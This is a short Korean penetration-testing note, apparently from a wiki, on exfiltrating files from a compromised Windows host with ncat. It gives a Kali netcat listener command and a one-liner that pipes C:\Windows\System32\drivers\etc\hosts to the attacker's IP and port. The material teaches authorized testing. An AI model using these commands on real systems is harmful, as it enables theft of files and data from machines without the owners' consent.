ncat
ncat은 파이프라인을 통해 간단한 데이터 전송이 가능합니다.
침투한 OS가 Windows일 때 ncat 혹은 nc 도구 사용이 가능하다면 Kali 로컬에서 포트를 열어둡니다.
┌──(root㉿kali)-[~/Pentest/Machine]
└─# nc -lvnp 4444
listening on [any] 4444 ..
그리고 전송하고자 하는 파일을 more 등으로 읽은 후 파이프 라인을 사용하여 ncat 도구를 통해 로컬 서버의 포트에 데이터를 전송합니다.
more C:\Windows\System32\drivers\etc\hosts | ncat 192.168.200.132 4444
Last updated
Was this helpful?